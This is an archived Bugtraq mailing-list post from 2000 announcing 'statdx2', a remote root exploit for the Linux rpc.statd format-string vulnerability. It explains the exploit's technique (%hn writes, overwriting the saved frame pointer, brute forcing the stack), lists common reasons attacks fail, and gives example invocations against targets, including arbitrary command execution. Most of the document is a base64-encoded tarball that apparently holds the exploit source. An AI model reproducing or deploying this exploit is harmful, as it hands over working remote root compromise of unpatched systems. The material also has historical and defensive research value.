[17147] in bugtraq
statdx2 - linux rpc.statd revisited
daemon@ATHENA.MIT.EDU (ron1n -)
Tue Oct 10 23:41:29 2000
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_20be_6d67_11c3"
Message-Id: <F61zDskqC5EtrUVYKkp000002f5@hotmail.com>
Date: Wed, 11 Oct 2000 08:36:16 EST
Reply-To: ron1n - <shellcode@HOTMAIL.COM>
From: ron1n - <shellcode@HOTMAIL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_20be_6d67_11c3
Content-Type: text/plain; format=flowed
Hi.
I know this is getting old and boring now, but a lot of bugtraq readers
have sent me reports of problems experienced when auditing their systems,
and others have asked questions regarding the code's usage. Because of the
number of these emails, I decided to take down statdx from its dusty shelf
and remold it into something that will give more bang for the buck.
You know the drill -- use only in an ethical manner, don't destroy valuable
information, even domains five levels deep at the bottom of the global
interest hierarchy don't need a tagged HTML facelift, etc.
Attached is statdx2.tar.gz. It contains the following two files:
* gdb.txt - how to get addresses with gdb (requested often)
* statdx2.c - the exploit itself (bug fixes, new stuff)
In another instance of keyboard diarrhea, here's the new introduction:
/**
*** statdx2 (the successor of statdx)
*** Linux rpc.statd remote root exploit
*** by ron1n <shellcode@hotmail.com>
*** October 10, 2000
***
*** $ ./statdx2 -h
***
*** This version supersedes my original release. The reason I chose to
*** resurrect this stale exploit is so the new incarnation would contain
*** many improvements over the first version.
***
*** There are major changes in the algorithm used in the exploit buffer
*** construction. The format string now uses "%hn" to eradicate several
*** rare but possible problems. I didn't know about the "$" trick when I
*** wrote statdx. Even though it seems to be the new trend, I decided to
*** ignore it for this particular exploit. An additional payload has been
*** added to allow remote execution of arbitrary commands. This should help
*** when the port-binding code can't be used.
***
*** There is now primitive brute forcing code which slightly increases
*** your chances of a successful exploitation against any vulnerable i386
*** distribution of Linux. In order to implement this, the attack strategy
*** had to be altered. A progressive brute force climb down the stack to
*** hit the correct address of the saved return address will cause problems
*** when the saved frame pointer is overwritten. Instead, an overwrite of
*** the saved frame pointer is used to cause redirection in the parent
*** epilog code (see phrack-55). This is much safer to use for brute
*** forcing and has the side benefit of being an alternative avenue of
*** attack when the usual target address contains a null byte. The null
*** byte truncation problem still exists when brute forcing though, so
*** use common sense.
***
*** The information below is based on numerous questions I receive.
***
*** common reasons for failure
*** --------------------------
*** o Confusing statd with rstatd.
*** o Attacking an architecture that isn't i386.
*** o Attacking an operating system that isn't Linux.
*** o Attacking a different distribution of Linux with the
*** default Redhat exploitation variables.
*** o Attacking a system whose statd has crashed because of
*** previous exploitation attempts, successful or not.
*** The portmapper will still advertise statd even though
*** it will remain dead until restarted.
*** o Attacking a patched system or a system with stack
*** protection. Stack protection will defeat this exploit.
*** I have seen a way to deliver the shellcode elsewhere
*** using a different procedure call, but I am not going
*** to steal that idea.
***
*** important notes
*** ---------------
*** o The attack may be logged in syslog target locations.
*** o Statd is a standalone service; be careful. Brute
*** forcing can be fatal. In fact, it's highly probable
*** that it will be fatal. The brute force mode exists
*** only to introduce a behavior-based form of blind
*** debugging with crashes mapping stack frames. This is
*** very difficult to do and it requires patience, but
*** it can be done.
*** o The nature of the vulnerability provides no means
*** to examine the stack remotely, afaik. If anyone
*** wants to drop me a free clue about this, email me.
***
*** dotslash examples
*** -----------------
*** # default Redhat attack
*** $./statdx2 -d0 target
*** # default Redhat attack; new payload
*** $./statdx2 -d0 -c "touch /blah" target
*** # saved ebp overwrite (used automatically when desirable)
*** $./statdx2 -a 0xbffff2fc -f target
*** # brute force mode -- 50 iterations (-f option implied)
*** $./statdx2 -a 0xbffff004 -n 50 -s 20 target
***
**/
_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.
Share information about yourself, create your own public profile at
http://profiles.msn.com.
------=_NextPart_000_20be_6d67_11c3
Content-Type: application/x-tar; name="statdx2.tar.gz"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="statdx2.tar.gz"
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
uAkAUAAA
------=_NextPart_000_20be_6d67_11c3--
